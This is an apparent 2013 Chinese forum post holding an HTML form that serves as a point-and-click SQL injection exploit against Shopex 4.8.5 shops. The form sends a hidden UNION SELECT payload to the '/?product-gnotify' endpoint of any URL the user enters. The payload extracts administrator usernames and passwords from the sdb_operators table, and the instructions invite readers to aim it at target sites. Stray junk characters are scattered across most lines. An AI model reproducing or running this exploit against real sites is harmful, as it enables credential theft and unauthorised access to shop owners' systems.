<center>
+ Z; w6 P8 p2 i5 r<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>* j7 k; ]& _6 k; x6 L) v; v
<form action="" method="post" name="submit_url">% j4 a. e4 F( R: v9 P- j, W6 ~& G2 Y
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>- E: s2 R, o0 P5 u9 p
<input type="hidden" name="goods[goods_id]" value="3">; G6 ~; N7 T0 S& ^+ g& X6 S! j
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">" J5 ^$ L! F4 c3 Z2 E
<input type="submit" value="给我注入" onclick=fsubmit()>% y' U* _. ?8 L* {' I
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com K4 N; }( `" z0 l. K0 n/ j
- [; t" w+ N) F* r7 b; b<script> ! A% i+ \# Z2 E$ m$ f
function fsubmit(){ 5 t$ d# W4 ~4 y" X, d* ]3 N
form = document.forms[0];
+ ^, v1 `# v% ?form.action = form.url.value+'/?product-gnotify'; 2 f# m: o! W! f" y7 u; I6 }
form.submit(); 1 r8 h" F( h' z! M7 I3 X2 q
} 6 v; M7 a& n; M
</script>% S2 S) w z( @( M
|
发表于 2013-1-23 09:20:52
收藏
支持
反对